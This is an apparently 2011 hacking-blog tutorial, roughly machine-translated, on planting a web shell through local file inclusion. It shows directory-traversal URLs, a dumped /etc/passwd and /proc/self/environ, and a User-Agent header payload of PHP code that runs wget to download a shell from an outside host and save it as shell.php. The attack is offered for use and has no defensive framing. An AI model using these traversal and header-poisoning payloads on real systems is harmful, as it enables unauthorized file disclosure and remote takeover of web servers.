How to plant a shell through the LFI (Local file disclosure) by the method proc / self / environ
Writer: gunslinger_
with this tutorial I will explain how to create a shell on the target server through the LFI method proc / self / environ.Ok we just ...
1. we find the websites that are vulnerable to attack by LFI.
example: http://site.com/info.php?file=news.php
2. let's replace the "news.php" with "../../../".
example: http://site.com/info.php?file=../../../
then we got an error, as follows ...
Warning: include (../../../) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
ok it seems, we have the opportunity to take advantage of include into another file.selanjutanya we try to find / etc / passwd.
example: http://site.com/info.php?file=etc/passwd
But we still got an error like the following:
Warning: include (/ etc / passwd) [function.include]: failed to open stream: No such file or directory in / home / Gunslinger / public_html / info.php on line 99
what if we directorynya Raise?let's try ...
example: http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoy, we managed to get the file / etc / passwd file that looks like the following:
root: x: 0:0: root: / root: / bin / bashdaemon: x: 1:1: daemon: / usr / sbin: / bin / shbin: x: 2:2: bin: / bin: / bin / shsys: x: 3:3: sys: / dev: / bin / shsync: x: 4:65534: sync: / bin: / bin / syncgames: x: 5:60: games: / usr / games: / bin / shman: x: 6:12: man: / var / cache / man: / bin / shlp: x: 7:7: lp: / var / spool / lpd: / bin / shmail: x: 8:8: mail: / var / mail: / bin / shnews: x: 9:9: news: / var / spool / news: / bin / shuucp: x: 10:10: uucp: / var / spool / uucp: / bin / shproxy: x: 13:13: proxy: / bin: / bin / shwww-data: x: 33:33: www-data: / var / www: / bin / shbackup: x: 34:34: backup: / var / backups: / bin / shlist: x: 38:38: Mailing List Manager: / var / list: / bin / shirc: x: 39:39: IRCd: / var / run / IRCd: / bin / shGNATS: x: 41:41: GNATS Bug-Reporting System (admin): / var / lib / GNATS: / bin / shnobody: x: 65534:65534: nobody: / nonexistent: / bin / shlibuuid: x: 100:101:: / var / lib / libuuid: / bin / shsyslog: x: 101:102:: / home / syslog: / bin / falseklog: x: 102:103:: / home / klog: / bin / falsehplip: x: 103:7: HPLIP system user ,,,:/ var / run / hplip: / bin / falseavahi-autoipd: x: 104:110: Avahi daemon AutoIP ,,,:/ var / lib / avahi-autoipd: / bin / falsegdm: x: 105:111: Gnome Display Manager: / var / lib / gdm: / bin / falsesaned: x: 106:113:: / home / saned: / bin / falsepulse: x: 107:114: PulseAudio daemon ,,,:/ var / run / pulse: / bin / falsemessagebus: x: 108:117:: / var / run / dbus: / bin / falsepolkituser: x: 109:118: PolicyKit ,,,:/ var / run / PolicyKit: / bin / falseavahi: x: 110:119: Avahi mDNS daemon ,,,:/ var / run / avahi-daemon: / bin / falsehaldaemon: x: 111:120: Hardware abstraction layer ,,,:/ var / run / hald: / bin / falseGunslinger: x: 1000:1000: gunslinger_ ,,,:/ home / Gunslinger: / bin / bashsnmp: x: 112:65534:: / var / lib / snmp: / bin / falseguest: x: 113:124: Guest ,,,:/ tmp / guest-home.rRZGXM: / bin / bashsshd: x: 114:65534:: / var / run / sshd: / usr / sbin / nologin
3. let us check whether / proc / self / environ can we access?Now, replace "/ etc / passwd" with "/ proc / self / environ"
example: http://site.com/info.php?file=../../../../../../../../../proc/self/environ
If you get something like this:
DOCUMENT_ROOT = / home / Gunslinger / public_html GATEWAY_INTERFACE = CGI/1.1 HTTP_ACCEPT = text / html, application / xml; q = 0.9, application / xhtml + xml, image / png, image / jpeg, image / gif, image / x-xbitmap , * / *; q = 0.1 HTTP_COOKIE = PHPSESSID = 3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST = www.site.com HTTP_REFERER = http://www.site.com/index.php?view=../../../../ .. / .. / etc / passwd HTTP_USER_AGENT = Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15PATH = / bin: / usr / bin QUERY_STRING = view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron REDIRECT_STATUS = 200 REMOTE_ADDR = 6x.1xx. 4x.1xx REMOTE_PORT = 35665 REQUEST_METHOD = GET REQUEST_URI = / index.php? view =..% 2F ..% 2F ..% 2F ..% 2F ..% 2F ..% 2Fproc% 2Fself% 2Fenviron SCRIPT_FILENAME = / home / Gunslinger / public_html / index.php SCRIPT_NAME = / index.php SERVER_ADDR = 1xx.1xx.1xx.6x SERVER_ADMIN = gunslinger@site.com SERVER_NAME = www.site.com SERVER_PORT = 80 SERVER_PROTOCOL = HTTP/1.0 SERVER_SIGNATURE =Apache/2.2.11 (Unix) DAV / 2 mod_ssl/2.2.11 PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 OpenSSL/0.9.8k Server at www.site.com Port 80
Apparently proc / self / environ can we access!if you get a blank page (blank) / proc / self / environ can not be accessed or may beroperating system * BSD
4. Now let us dengann malicious code injection with poison http-header. how can we menginjeksinya? we can use the tamper data in firefox addon.you can download here: https://addons.mozilla.org/en-US/firefox/addon/966open the tamper data in firefox and then enter the url / proc / self / environ that had "http://site.com/info.php?file=../../../../../../. . / .. / .. / proc / self / environ "then the user-agent fill in the following code:view sourceprint?1 <? System ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
orview sourceprint?1 <? Exec ('wget-O http://r57.gen.tr/c100.txt shell.php');?>
then submit.
5. if we managed to inject malicious code below, then the shell will be there in a place like this.
www.http://site.com/shell.php
Happy hacking!
Our Sponsors
Search Box
Labels
- Hacking (2)
- han (1)
- Linux (1)
- Network (3)
- Programing (2)
- Source Code (1)
- Tweaking (1)
- Web Design (2)
Popular Posts
-
Ciri2 seorang hacker: 1.temen hidup dia adalah PC,Laptop..atau sebagainya. 2.jarang besosialisasi dengan dunia luar. 3.aktif dalam foru...
-
NOTE: If you would like some Python development done, my company, Stochastic Technologies , is available for consulting. Also, this tutori...
-
WASHINGTON - Lebih dari 10 situs yang dimiliki oleh Microsoft mendapat serangan Domain Name System (DNS) dari para hacker. Seperti yang d...
-
Kecewa atau tidak, semua tergantung Anda, tergantung bagaimana Anda menyikapi kegagalan. Berharap sedikit hanya akan menghambat Anda men...
-
Berita ini hampir sama hebohnya dengan berita postingan ane sebelumnya " Robot Pelacur Wanita Pertama Di Dunia " sehingga meng...
-
Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal kar...
-
Hadeh Gw Kesel Bgt sama ni tukang karcis di stasiun , ceritanya gw waktu itu mau beli karcis kereta yang kereta ekonomi jabodetabek , eh pas...
-
Buku Terbesar Di Dunia saat ini from gulfnes.com Dubai- Sebuah perusahaan yang berbasis di Dubai berencana untuk mengalahkan rekor du...
-
The Hacker News. Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDos...
-
Assuming you have purchased a Linux Mint CD or created one yourself, you may reach the graphical installer by inserting the installation CD...
My Blog Chart
Global Map
Live Traffic
Link exchange
Poll
VISITORS COUNTRY FLAG'S
Follower's my blog's
Search This Blog
Labels
- Hacking (2)
- han (1)
- Linux (1)
- Network (3)
- Programing (2)
- Source Code (1)
- Tweaking (1)
- Web Design (2)
About Me
- Penggemar Angkringan
- iam only ordinary person but my evil side maybe dangerous
Blog Archive
-
▼
2011
(46)
- ► 09/25 - 10/02 (2)
- ► 09/18 - 09/25 (6)
- ► 09/04 - 09/11 (9)
- ► 08/28 - 09/04 (5)
- ► 08/21 - 08/28 (13)
- ▼ 07/17 - 07/24 (7)
- ► 07/03 - 07/10 (4)
© 2011 My Blog is my style . All Rights Reserved.